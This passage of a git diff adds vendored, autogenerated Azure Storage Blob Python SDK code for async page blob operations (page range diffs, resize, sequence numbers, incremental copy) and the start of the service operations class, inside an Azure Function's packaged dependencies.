template_url=self.get_page_ranges.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_page_ranges_diff( + self, + snapshot: Optional[str] = None, + timeout: Optional[int] = None, + prevsnapshot: Optional[str] = None, + prev_snapshot_url: Optional[str] = None, + range: Optional[str] = None, + request_id_parameter: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + lease_access_conditions: 
Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> "_models.PageList": + """The Get Page Ranges Diff operation returns the list of valid page ranges for a page blob that + were changed between target blob and previous snapshot. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param prevsnapshot: Optional in version 2015-07-08 and newer. The prevsnapshot parameter is a + DateTime value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by prevsnapshot is + the older of the two. Note that incremental snapshots are currently supported only for blobs + created on or after January 1, 2016. Default value is None. + :type prevsnapshot: str + :param prev_snapshot_url: Optional. This header is only supported in service versions + 2019-04-19 and after and specifies the URL of a previous snapshot of the target blob. The + response will only contain pages that were changed between the target blob and its previous + snapshot. Default value is None. + :type prev_snapshot_url: str + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "pagelist". 
Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: PageList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.PageList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.PageList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "pagelist") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_page_ranges_diff_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + timeout=timeout, + prevsnapshot=prevsnapshot, + prev_snapshot_url=prev_snapshot_url, + range=range, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + marker=marker, + maxresults=maxresults, + template_url=self.get_page_ranges_diff.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('PageList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_page_ranges_diff.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def resize( # pylint: disable=inconsistent-return-statements + self, + blob_content_length: int, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + 
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """Resize the Blob. + + :param blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_resize_request( + url=self._config.url, + comp=comp, + version=self._config.version, + blob_content_length=blob_content_length, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + 
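+            # remaining conditional-request kwargs: ETag match conditions and the blob tag filter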
if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.resize.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + resize.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def update_sequence_number( # pylint: disable=inconsistent-return-statements + self, + sequence_number_action: Union[str, "_models.SequenceNumberActionType"], + timeout: Optional[int] = None, + blob_sequence_number: Optional[int] = 0, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """Update the sequence number of the blob. + + :param sequence_number_action: Required if the x-ms-blob-sequence-number header is set for the + request. This property applies to page blobs only. This property indicates how the service + should modify the blob's sequence number. + :type sequence_number_action: str or ~azure.storage.blob.models.SequenceNumberActionType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. 
Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_update_sequence_number_request( + url=self._config.url, + comp=comp, + version=self._config.version, + sequence_number_action=sequence_number_action, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + template_url=self.update_sequence_number.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + update_sequence_number.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def copy_incremental( # pylint: disable=inconsistent-return-statements + self, + copy_source: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Copy Incremental operation copies a snapshot of the 
source page blob to a destination page + blob. The snapshot is copied such that only the differential changes since the previously + copied snapshot are transferred to the destination. The copied snapshots are complete copies of + the original snapshot and can be read or copied from as usual. This API is supported since REST + version 2016-05-31. + + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "incrementalcopy". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "incrementalcopy") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_copy_incremental_request( + url=self._config.url, + comp=comp, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.copy_incremental.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', 
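+        # Last-Modified is parsed from an RFC 1123 date string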
response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_incremental.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_service_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_service_operations.py new file mode 100644 index 0000000..b898f74 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_service_operations.py @@ -0,0 +1,725 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._service_operations import build_filter_blobs_request, build_get_account_info_request, build_get_properties_request, build_get_statistics_request, build_get_user_delegation_key_request, build_list_containers_segment_request, build_set_properties_request, build_submit_batch_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class ServiceOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`service` attribute. 
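+
+    A minimal usage sketch (illustrative only, not part of the generated code;
+    ``conn_str`` below is an assumed storage connection string). Callers
+    normally reach these operations through the high-level async client::
+
+        from azure.storage.blob.aio import BlobServiceClient
+
+        service = BlobServiceClient.from_connection_string(conn_str)
+        # get_service_properties() ultimately drives ServiceOperations.get_properties
+        props = await service.get_service_properties()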
+ """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def set_properties( # pylint: disable=inconsistent-return-statements + self, + storage_service_properties: "_models.StorageServiceProperties", + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """Sets properties for a storage account's Blob service endpoint, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param storage_service_properties: The StorageService properties. + :type storage_service_properties: ~azure.storage.blob.models.StorageServiceProperties + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(storage_service_properties, 'StorageServiceProperties', is_xml=True) + + request = build_set_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.set_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + 
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_properties( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.StorageServiceProperties": + """gets the properties of a storage account's Blob service, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceProperties, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceProperties + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceProperties"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('StorageServiceProperties', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def get_statistics( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> 
"_models.StorageServiceStats": + """Retrieves statistics related to replication for the Blob service. It is only available on the + secondary location endpoint when read-access geo-redundant replication is enabled for the + storage account. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "stats". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceStats, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceStats + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceStats"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "stats") # type: str + + + request = build_get_statistics_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_statistics.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('StorageServiceStats', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_statistics.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def list_containers_segment( + self, + prefix: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + include: Optional[List[Union[str, "_models.ListContainersIncludeType"]]] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.ListContainersSegmentResponse": + """The List Containers Segment operation returns a list of the 
containers under the specified + account. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify that the container's metadata be returned as + part of the response body. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListContainersIncludeType] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. 
